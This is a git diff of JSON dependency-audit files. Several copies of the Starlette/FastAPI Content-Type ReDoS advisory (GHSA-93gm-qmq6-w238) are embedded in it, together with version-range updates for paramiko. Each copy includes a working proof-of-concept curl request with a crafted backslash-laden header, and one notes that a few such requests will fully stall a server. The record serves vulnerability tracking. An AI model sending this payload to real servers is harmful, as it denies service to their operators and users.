Uvicorn:\n\n```console\n$ ps -fA | grep uvicorn\n\n 501 59461 24785 0 4:28PM ttys004 0:00.13 /Users/user/code/starlette/env3.10/bin/python /Users/user/code/starlette/env3.10/bin/uvicorn redos_starlette:app\n 501 59466 99935 0 
4:28PM ttys010 0:00.00 grep uvicorn\n```\n\nIn this case, the process ID was `59461`, then you can kill it (forcefully, with `-9`) with:\n\n```console\n$ kill -9 59461\n```\n\n### Impact\n\nIt's a ReDoS, (Regular expression Denial of Service), it only applies to those reading form data, using `python-multipart`. This way it also affects other libraries using Starlette, like FastAPI.\n\n### Original Report\n\nThis was originally reported to FastAPI as an email to security@tiangolo.com, sent via https://huntr.com/, the original reporter is Marcello, https://github.com/byt3bl33d3r\n\n
\nOriginal report to FastAPI\n\nHey Tiangolo!\n\nMy name's Marcello and I work on the ProtectAI/Huntr Threat Research team, a few months ago we got a report (from @nicecatch2000) of a ReDoS affecting another very popular Python web framework. After some internal research, I found that FastAPI is vulnerable to the same ReDoS under certain conditions (only when it parses Form data not JSON).\n\nHere are the details: I'm using the latest version of FastAPI (0.109.0) and the following code:\n\n```Python\nfrom typing import Annotated\nfrom fastapi.responses import HTMLResponse\nfrom fastapi import FastAPI,Form\nfrom pydantic import BaseModel\n\nclass Item(BaseModel):\n username: str\n\napp = FastAPI()\n\n@app.get(\"/\", response_class=HTMLResponse)\nasync def index():\n return HTMLResponse(\"Test\", status_code=200)\n\n@app.post(\"/submit/\")\nasync def submit(username: Annotated[str, Form()]):\n return {\"username\": username}\n\n@app.post(\"/submit_json/\")\nasync def submit_json(item: Item):\n return {\"username\": item.username}\n```\n\nI'm running the above with uvicorn with the following command:\n\n```console\nuvicorn server:app\n```\n\nThen run the following cUrl command:\n\n```\ncurl -v -X 'POST' -H $'Content-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' --data-binary 'input=1' 'http://localhost:8000/submit/'\n```\n\nYou'll see the server locks up, is unable to serve anymore requests and one CPU core is pegged to 100%\n\nYou can even start uvicorn with multiple workers with the --workers 4 argument 
and as long as you send (workers + 1) requests you'll completely DoS the FastApi server.\n\nIf you try submitting Json to the /submit_json endpoint with the malicious Content-Type header you'll see it isn't vulnerable. So this only affects FastAPI when it parses Form data.\n\nCheers\n\n#### Impact\n\nAn attacker is able to cause a DoS on a FastApi server via a malicious Content-Type header if it parses Form data.\n\n#### Occurrences\n\n[params.py L586](https://github.com/tiangolo/fastapi/blob/d74b3b25659b42233a669f032529880de8bd6c2d/fastapi/params.py#L586)\n\n
", + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "starlette", + "purl": "pkg:pypi/starlette" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.36.2" + } + ] + } + ], + "versions": [ + "0.1.0", + "0.1.1", + "0.1.10", + "0.1.11", + "0.1.12", + "0.1.13", + "0.1.14", + "0.1.15", + "0.1.16", + "0.1.17", + "0.1.2", + "0.1.3", + "0.1.4", + "0.1.5", + "0.1.6", + "0.1.7", + "0.1.8", + "0.1.9", + "0.10.0", + "0.10.1", + "0.10.2", + "0.10.3", + "0.10.4", + "0.10.5", + "0.10.6", + "0.10.7", + "0.11.0", + "0.11.1", + "0.11.2", + "0.11.3", + "0.11.4", + "0.12.0", + "0.12.0b1", + "0.12.0b2", + "0.12.0b3", + "0.12.1", + "0.12.10", + "0.12.11", + "0.12.12", + "0.12.13", + "0.12.2", + "0.12.3", + "0.12.4", + "0.12.5", + "0.12.6", + "0.12.7", + "0.12.8", + "0.12.9", + "0.13.0", + "0.13.1", + "0.13.2", + "0.13.3", + "0.13.4", + "0.13.5", + "0.13.6", + "0.13.7", + "0.13.8", + "0.14.0", + "0.14.1", + "0.14.2", + "0.15.0", + "0.16.0", + "0.17.0", + "0.17.1", + "0.18.0", + "0.19.0", + "0.19.1", + "0.2.0", + "0.2.1", + "0.2.2", + "0.2.3", + "0.20.0", + "0.20.1", + "0.20.2", + "0.20.3", + "0.20.4", + "0.21.0", + "0.22.0", + "0.23.0", + "0.23.1", + "0.24.0", + "0.25.0", + "0.26.0", + "0.26.0.post1", + "0.26.1", + "0.27.0", + "0.28.0", + "0.29.0", + "0.3.0", + "0.3.1", + "0.3.2", + "0.3.3", + "0.3.4", + "0.3.5", + "0.3.6", + "0.3.7", + "0.30.0", + "0.31.0", + "0.31.1", + "0.32.0", + "0.32.0.post1", + "0.33.0", + "0.34.0", + "0.35.0", + "0.35.1", + "0.36.0", + "0.36.1", + "0.4.0", + "0.4.1", + "0.4.2", + "0.5.0", + "0.5.1", + "0.5.2", + "0.5.3", + "0.5.4", + "0.5.5", + "0.6.0", + "0.6.1", + "0.6.2", + "0.6.3", + "0.7.0", + "0.7.1", + "0.7.2", + "0.7.3", + "0.7.4", + "0.8.0", + "0.8.1", + "0.8.2", + "0.8.3", + "0.8.4", + "0.8.5", + "0.8.6", + "0.8.7", + "0.8.8", + "0.9.0", + "0.9.1", + "0.9.10", + "0.9.11", + "0.9.2", + "0.9.3", + "0.9.4", + "0.9.5", + "0.9.6", + "0.9.7", + "0.9.8", + "0.9.9" + ], + 
"database_specific": { + "last_known_affected_version_range": "<= 0.36.1", + "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/02/GHSA-93gm-qmq6-w238/GHSA-93gm-qmq6-w238.json" + } + } + ], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/encode/starlette/security/advisories/GHSA-93gm-qmq6-w238" + }, + { + "type": "WEB", + "url": "https://github.com/encode/starlette/commit/13e5c26a27f4903924624736abd6131b2da80cc5" + }, + { + "type": "WEB", + "url": "https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74" + }, + { + "type": "PACKAGE", + "url": "https://github.com/encode/starlette" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-400" + ], + "github_reviewed": true, + "github_reviewed_at": "2024-02-05T17:01:19Z", + "nvd_published_at": null, + "severity": "HIGH" + } + } + ], + "groups": [ + { + "ids": [ + "GHSA-93gm-qmq6-w238" + ], + "aliases": [ + "GHSA-93gm-qmq6-w238" + ] + } + ] } ] \ No newline at end of file diff --git a/audits/fdroidserver-requirements.audit.json b/audits/fdroidserver-requirements.audit.json index 2b7af35f..1c60f561 100644 --- a/audits/fdroidserver-requirements.audit.json +++ b/audits/fdroidserver-requirements.audit.json @@ -371,7 +371,7 @@ ], "vulnerabilities": [ { - "modified": "2024-01-29T09:46:53Z", + "modified": "2024-02-05T23:31:03Z", "published": "2023-12-18T19:22:09Z", "schema_version": "1.6.0", "id": "GHSA-45x7-px36-x8w8", @@ -439,7 +439,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "2.5.0" }, { "fixed": "3.4.0" 
@@ -448,108 +448,6 @@ } ], "versions": [ - "0.1-bulbasaur", - "0.1-charmander", - "0.9-doduo", - "0.9-eevee", - "0.9-fearow", - "0.9-gyarados", - "0.9-horsea", - "0.9-ivysaur", - "1.0", - "1.1", - "1.10.0", - "1.10.1", - "1.10.2", - "1.10.3", - "1.10.4", - "1.10.5", - "1.10.6", - "1.10.7", - "1.11.0", - "1.11.1", - "1.11.2", - "1.11.3", - "1.11.4", - "1.11.5", - "1.11.6", - "1.12.0", - "1.12.1", - "1.12.2", - "1.12.3", - "1.12.4", - "1.13.0", - "1.13.1", - "1.13.2", - "1.13.3", - "1.13.4", - "1.14.0", - "1.14.1", - "1.14.2", - "1.14.3", - "1.15.0", - "1.15.1", - "1.15.2", - "1.15.3", - "1.15.4", - "1.15.5", - "1.16.0", - "1.16.1", - "1.16.2", - "1.16.3", - "1.17.0", - "1.17.1", - "1.17.2", - "1.17.3", - "1.17.4", - "1.17.5", - "1.17.6", - "1.18.0", - "1.18.1", - "1.18.2", - "1.18.3", - "1.18.4", - "1.18.5", - "1.2", - "1.3", - "1.3.1", - "1.4", - "1.5.1", - "1.5.2", - "1.5.4", - "1.6", - "1.6.1", - "1.6.2", - "1.6.3", - "1.6.4", - "1.7", - "1.7.1", - "1.7.2", - "1.7.4", - "1.7.5", - "1.7.6", - "1.7.7.1", - "1.7.7.2", - "1.8.0", - "1.8.1", - "1.9.0", - "2.0.0", - "2.0.1", - "2.0.2", - "2.0.3", - "2.0.4", - "2.0.5", - "2.0.6", - "2.0.7", - "2.0.8", - "2.0.9", - "2.1.0", - "2.1.1", - "2.1.2", - "2.1.3", - "2.1.4", - "2.1.5", - "2.1.6", "2.10.0", "2.10.1", "2.10.2", @@ -560,19 +458,6 @@ "2.11.0", "2.11.1", "2.12.0", - "2.2.0", - "2.2.1", - "2.2.2", - "2.2.3", - "2.2.4", - "2.3.0", - "2.3.1", - "2.3.2", - "2.3.3", - "2.4.0", - "2.4.1", - "2.4.2", - "2.4.3", "2.5.0", "2.5.1", "2.6.0", @@ -641,6 +526,10 @@ "type": "WEB", "url": "https://github.com/paramiko/paramiko/issues/2337" }, + { + "type": "WEB", + "url": "https://github.com/paramiko/paramiko/issues/2337#issuecomment-1887642773" + }, { "type": "WEB", "url": "https://github.com/proftpd/proftpd/issues/456" diff --git a/audits/flintrock-requirements.audit.json b/audits/flintrock-requirements.audit.json index 69d06370..125f024a 100644 --- a/audits/flintrock-requirements.audit.json 
+++ b/audits/flintrock-requirements.audit.json @@ -10,7 +10,7 @@ ], "vulnerabilities": [ { - "modified": "2024-01-29T09:46:53Z", + "modified": "2024-02-05T23:31:03Z", "published": "2023-12-18T19:22:09Z", "schema_version": "1.6.0", "id": "GHSA-45x7-px36-x8w8", @@ -78,7 +78,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "2.5.0" }, { "fixed": "3.4.0" @@ -87,108 +87,6 @@ } ], "versions": [ - "0.1-bulbasaur", - "0.1-charmander", - "0.9-doduo", - "0.9-eevee", - "0.9-fearow", - "0.9-gyarados", - "0.9-horsea", - "0.9-ivysaur", - "1.0", - "1.1", - "1.10.0", - "1.10.1", - "1.10.2", - "1.10.3", - "1.10.4", - "1.10.5", - "1.10.6", - "1.10.7", - "1.11.0", - "1.11.1", - "1.11.2", - "1.11.3", - "1.11.4", - "1.11.5", - "1.11.6", - "1.12.0", - "1.12.1", - "1.12.2", - "1.12.3", - "1.12.4", - "1.13.0", - "1.13.1", - "1.13.2", - "1.13.3", - "1.13.4", - "1.14.0", - "1.14.1", - "1.14.2", - "1.14.3", - "1.15.0", - "1.15.1", - "1.15.2", - "1.15.3", - "1.15.4", - "1.15.5", - "1.16.0", - "1.16.1", - "1.16.2", - "1.16.3", - "1.17.0", - "1.17.1", - "1.17.2", - "1.17.3", - "1.17.4", - "1.17.5", - "1.17.6", - "1.18.0", - "1.18.1", - "1.18.2", - "1.18.3", - "1.18.4", - "1.18.5", - "1.2", - "1.3", - "1.3.1", - "1.4", - "1.5.1", - "1.5.2", - "1.5.4", - "1.6", - "1.6.1", - "1.6.2", - "1.6.3", - "1.6.4", - "1.7", - "1.7.1", - "1.7.2", - "1.7.4", - "1.7.5", - "1.7.6", - "1.7.7.1", - "1.7.7.2", - "1.8.0", - "1.8.1", - "1.9.0", - "2.0.0", - "2.0.1", - "2.0.2", - "2.0.3", - "2.0.4", - "2.0.5", - "2.0.6", - "2.0.7", - "2.0.8", - "2.0.9", - "2.1.0", - "2.1.1", - "2.1.2", - "2.1.3", - "2.1.4", - "2.1.5", - "2.1.6", "2.10.0", "2.10.1", "2.10.2", @@ -199,19 +97,6 @@ "2.11.0", "2.11.1", "2.12.0", - "2.2.0", - "2.2.1", - "2.2.2", - "2.2.3", - "2.2.4", - "2.3.0", - "2.3.1", - "2.3.2", - "2.3.3", - "2.4.0", - "2.4.1", - "2.4.2", - "2.4.3", "2.5.0", "2.5.1", "2.6.0", 
@@ -280,6 +165,10 @@
 "type": "WEB",
 "url": "https://github.com/paramiko/paramiko/issues/2337"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/paramiko/paramiko/issues/2337#issuecomment-1887642773"
+ },
 {
 "type": "WEB",
 "url": "https://github.com/proftpd/proftpd/issues/456"
diff --git a/audits/platformio-requirements.audit.json b/audits/platformio-requirements.audit.json
new file mode 100644
index 00000000..7bb4dafa
--- /dev/null
+++ b/audits/platformio-requirements.audit.json
@@ -0,0 +1,239 @@ +[ + { + "package": { + "name": "starlette", + "version": "0.35.1", + "ecosystem": "PyPI" + }, + "dependency_groups": [ + "platformio-requirements" + ], + "vulnerabilities": [ + { + "modified": "2024-02-05T17:18:11Z", + "published": "2024-02-05T17:01:19Z", + "schema_version": "1.6.0", + "id": "GHSA-93gm-qmq6-w238", + "summary": "Starlette Content-Type Header ReDoS", + "details": "### Summary\n\nWhen using form data, `python-multipart` uses a Regular Expression to parse the HTTP `Content-Type` header, including options.\n\nAn attacker could send a custom-made `Content-Type` option that is very difficult for the RegEx to process, consuming CPU resources and stalling indefinitely (minutes or more) while holding the main event loop. This means that process can't handle any more requests.\n\nThis can create a ReDoS (Regular expression Denial of Service): https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS\n\nThis only applies when the app uses form data, parsed with `python-multipart`.\n\n### Details\n\nA regular HTTP `Content-Type` header could look like:\n\n```\nContent-Type: text/html; charset=utf-8\n```\n\n`python-multipart` parses the option with this RegEx: https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74\n\nA custom option could be made and sent to the server to break it with:\n\n```\nContent-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\n```\n\n### PoC\n\nCreate a Starlette app 
that uses form data. To reproduce it it's not even necessary to create a Starlette app, just using the `Request` is enough:\n\n```Python\n# main.py\nfrom starlette.requests import Request\nfrom starlette.responses import JSONResponse\n\n\nasync def app(scope, receive, send):\n assert scope[\"type\"] == \"http\"\n request = Request(scope, receive)\n data = await request.form()\n response_data = {}\n for key in data:\n print(key, data.getlist(key))\n response_data[key] = data.getlist(key)\n response = JSONResponse(response_data)\n await response(scope, receive, send)\n```\n\nThen start it with:\n\n```console\n$ uvicorn main:app\n\nINFO: Started server process [50601]\nINFO: Waiting for application startup.\nINFO: ASGI 'lifespan' protocol appears unsupported.\nINFO: Application startup complete.\nINFO: Uvicorn running on http://127.0.0.1:8000 (Press CTRL+C to quit)\n```\n\nThen send the attacking request with:\n\n```console\n$ curl -v -X 'POST' -H $'Content-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' --data-binary 'input=1' 'http://localhost:8000/'\n```\n\n#### Stopping it\n\nBecause that holds the main loop consuming the CPU non-stop, it's not possible to simply kill Uvicorn with `Ctrl+C` as it can't handle the signal.\n\nTo stop it, first check the process ID running Uvicorn:\n\n```console\n$ ps -fA | grep uvicorn\n\n 501 59461 24785 0 4:28PM ttys004 0:00.13 /Users/user/code/starlette/env3.10/bin/python /Users/user/code/starlette/env3.10/bin/uvicorn redos_starlette:app\n 501 59466 99935 0 4:28PM 
ttys010 0:00.00 grep uvicorn\n```\n\nIn this case, the process ID was `59461`, then you can kill it (forcefully, with `-9`) with:\n\n```console\n$ kill -9 59461\n```\n\n### Impact\n\nIt's a ReDoS, (Regular expression Denial of Service), it only applies to those reading form data, using `python-multipart`. This way it also affects other libraries using Starlette, like FastAPI.\n\n### Original Report\n\nThis was originally reported to FastAPI as an email to security@tiangolo.com, sent via https://huntr.com/, the original reporter is Marcello, https://github.com/byt3bl33d3r\n\n
\nOriginal report to FastAPI\n\nHey Tiangolo!\n\nMy name's Marcello and I work on the ProtectAI/Huntr Threat Research team, a few months ago we got a report (from @nicecatch2000) of a ReDoS affecting another very popular Python web framework. After some internal research, I found that FastAPI is vulnerable to the same ReDoS under certain conditions (only when it parses Form data not JSON).\n\nHere are the details: I'm using the latest version of FastAPI (0.109.0) and the following code:\n\n```Python\nfrom typing import Annotated\nfrom fastapi.responses import HTMLResponse\nfrom fastapi import FastAPI,Form\nfrom pydantic import BaseModel\n\nclass Item(BaseModel):\n username: str\n\napp = FastAPI()\n\n@app.get(\"/\", response_class=HTMLResponse)\nasync def index():\n return HTMLResponse(\"Test\", status_code=200)\n\n@app.post(\"/submit/\")\nasync def submit(username: Annotated[str, Form()]):\n return {\"username\": username}\n\n@app.post(\"/submit_json/\")\nasync def submit_json(item: Item):\n return {\"username\": item.username}\n```\n\nI'm running the above with uvicorn with the following command:\n\n```console\nuvicorn server:app\n```\n\nThen run the following cUrl command:\n\n```\ncurl -v -X 'POST' -H $'Content-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' --data-binary 'input=1' 'http://localhost:8000/submit/'\n```\n\nYou'll see the server locks up, is unable to serve anymore requests and one CPU core is pegged to 100%\n\nYou can even start uvicorn with multiple workers with the --workers 4 argument 
and as long as you send (workers + 1) requests you'll completely DoS the FastApi server.\n\nIf you try submitting Json to the /submit_json endpoint with the malicious Content-Type header you'll see it isn't vulnerable. So this only affects FastAPI when it parses Form data.\n\nCheers\n\n#### Impact\n\nAn attacker is able to cause a DoS on a FastApi server via a malicious Content-Type header if it parses Form data.\n\n#### Occurrences\n\n[params.py L586](https://github.com/tiangolo/fastapi/blob/d74b3b25659b42233a669f032529880de8bd6c2d/fastapi/params.py#L586)\n\n
", + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "starlette", + "purl": "pkg:pypi/starlette" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.36.2" + } + ] + } + ], + "versions": [ + "0.1.0", + "0.1.1", + "0.1.10", + "0.1.11", + "0.1.12", + "0.1.13", + "0.1.14", + "0.1.15", + "0.1.16", + "0.1.17", + "0.1.2", + "0.1.3", + "0.1.4", + "0.1.5", + "0.1.6", + "0.1.7", + "0.1.8", + "0.1.9", + "0.10.0", + "0.10.1", + "0.10.2", + "0.10.3", + "0.10.4", + "0.10.5", + "0.10.6", + "0.10.7", + "0.11.0", + "0.11.1", + "0.11.2", + "0.11.3", + "0.11.4", + "0.12.0", + "0.12.0b1", + "0.12.0b2", + "0.12.0b3", + "0.12.1", + "0.12.10", + "0.12.11", + "0.12.12", + "0.12.13", + "0.12.2", + "0.12.3", + "0.12.4", + "0.12.5", + "0.12.6", + "0.12.7", + "0.12.8", + "0.12.9", + "0.13.0", + "0.13.1", + "0.13.2", + "0.13.3", + "0.13.4", + "0.13.5", + "0.13.6", + "0.13.7", + "0.13.8", + "0.14.0", + "0.14.1", + "0.14.2", + "0.15.0", + "0.16.0", + "0.17.0", + "0.17.1", + "0.18.0", + "0.19.0", + "0.19.1", + "0.2.0", + "0.2.1", + "0.2.2", + "0.2.3", + "0.20.0", + "0.20.1", + "0.20.2", + "0.20.3", + "0.20.4", + "0.21.0", + "0.22.0", + "0.23.0", + "0.23.1", + "0.24.0", + "0.25.0", + "0.26.0", + "0.26.0.post1", + "0.26.1", + "0.27.0", + "0.28.0", + "0.29.0", + "0.3.0", + "0.3.1", + "0.3.2", + "0.3.3", + "0.3.4", + "0.3.5", + "0.3.6", + "0.3.7", + "0.30.0", + "0.31.0", + "0.31.1", + "0.32.0", + "0.32.0.post1", + "0.33.0", + "0.34.0", + "0.35.0", + "0.35.1", + "0.36.0", + "0.36.1", + "0.4.0", + "0.4.1", + "0.4.2", + "0.5.0", + "0.5.1", + "0.5.2", + "0.5.3", + "0.5.4", + "0.5.5", + "0.6.0", + "0.6.1", + "0.6.2", + "0.6.3", + "0.7.0", + "0.7.1", + "0.7.2", + "0.7.3", + "0.7.4", + "0.8.0", + "0.8.1", + "0.8.2", + "0.8.3", + "0.8.4", + "0.8.5", + "0.8.6", + "0.8.7", + "0.8.8", + "0.9.0", + "0.9.1", + "0.9.10", + "0.9.11", + "0.9.2", + "0.9.3", + "0.9.4", + "0.9.5", + "0.9.6", + "0.9.7", + "0.9.8", + "0.9.9" + ], + 
"database_specific": { + "last_known_affected_version_range": "<= 0.36.1", + "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/02/GHSA-93gm-qmq6-w238/GHSA-93gm-qmq6-w238.json" + } + } + ], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/encode/starlette/security/advisories/GHSA-93gm-qmq6-w238" + }, + { + "type": "WEB", + "url": "https://github.com/encode/starlette/commit/13e5c26a27f4903924624736abd6131b2da80cc5" + }, + { + "type": "WEB", + "url": "https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74" + }, + { + "type": "PACKAGE", + "url": "https://github.com/encode/starlette" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-400" + ], + "github_reviewed": true, + "github_reviewed_at": "2024-02-05T17:01:19Z", + "nvd_published_at": null, + "severity": "HIGH" + } + } + ], + "groups": [ + { + "ids": [ + "GHSA-93gm-qmq6-w238" + ], + "aliases": [ + "GHSA-93gm-qmq6-w238" + ] + } + ] + } +] \ No newline at end of file diff --git a/audits/schemathesis-requirements.audit.json b/audits/schemathesis-requirements.audit.json new file mode 100644 index 00000000..d78329ad --- /dev/null +++ b/audits/schemathesis-requirements.audit.json 
@@ -0,0 +1,239 @@ +[ + { + "package": { + "name": "starlette", + "version": "0.36.1", + "ecosystem": "PyPI" + }, + "dependency_groups": [ + "schemathesis-requirements" + ], + "vulnerabilities": [ + { + "modified": "2024-02-05T17:18:11Z", + "published": "2024-02-05T17:01:19Z", + "schema_version": "1.6.0", + "id": "GHSA-93gm-qmq6-w238", + "summary": "Starlette Content-Type Header ReDoS", + "details": "### Summary\n\nWhen using form data, `python-multipart` uses a Regular Expression to parse the HTTP `Content-Type` header, including options.\n\nAn attacker could send a custom-made `Content-Type` option that is very difficult for the RegEx to process, consuming CPU resources and stalling indefinitely (minutes or more) while holding the main event loop. This means that process can't handle any more requests.\n\nThis can create a ReDoS (Regular expression Denial of Service): https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS\n\nThis only applies when the app uses form data, parsed with `python-multipart`.\n\n### Details\n\nA regular HTTP `Content-Type` header could look like:\n\n```\nContent-Type: text/html; charset=utf-8\n```\n\n`python-multipart` parses the option with this RegEx: https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74\n\nA custom option could be made and sent to the server to break it with:\n\n```\nContent-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\n```\n\n### PoC\n\nCreate a Starlette app 
that uses form data. To reproduce it it's not even necessary to create a Starlette app, just using the `Request` is enough:\n\n```Python\n# main.py\nfrom starlette.requests import Request\nfrom starlette.responses import JSONResponse\n\n\nasync def app(scope, receive, send):\n assert scope[\"type\"] == \"http\"\n request = Request(scope, receive)\n data = await request.form()\n response_data = {}\n for key in data:\n print(key, data.getlist(key))\n response_data[key] = data.getlist(key)\n response = JSONResponse(response_data)\n await response(scope, receive, send)\n```\n\nThen start it with:\n\n```console\n$ uvicorn main:app\n\nINFO: Started server process [50601]\nINFO: Waiting for application startup.\nINFO: ASGI 'lifespan' protocol appears unsupported.\nINFO: Application startup complete.\nINFO: Uvicorn running on http://127.0.0.1:8000 (Press CTRL+C to quit)\n```\n\nThen send the attacking request with:\n\n```console\n$ curl -v -X 'POST' -H $'Content-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' --data-binary 'input=1' 'http://localhost:8000/'\n```\n\n#### Stopping it\n\nBecause that holds the main loop consuming the CPU non-stop, it's not possible to simply kill Uvicorn with `Ctrl+C` as it can't handle the signal.\n\nTo stop it, first check the process ID running Uvicorn:\n\n```console\n$ ps -fA | grep uvicorn\n\n 501 59461 24785 0 4:28PM ttys004 0:00.13 /Users/user/code/starlette/env3.10/bin/python /Users/user/code/starlette/env3.10/bin/uvicorn redos_starlette:app\n 501 59466 99935 0 4:28PM 
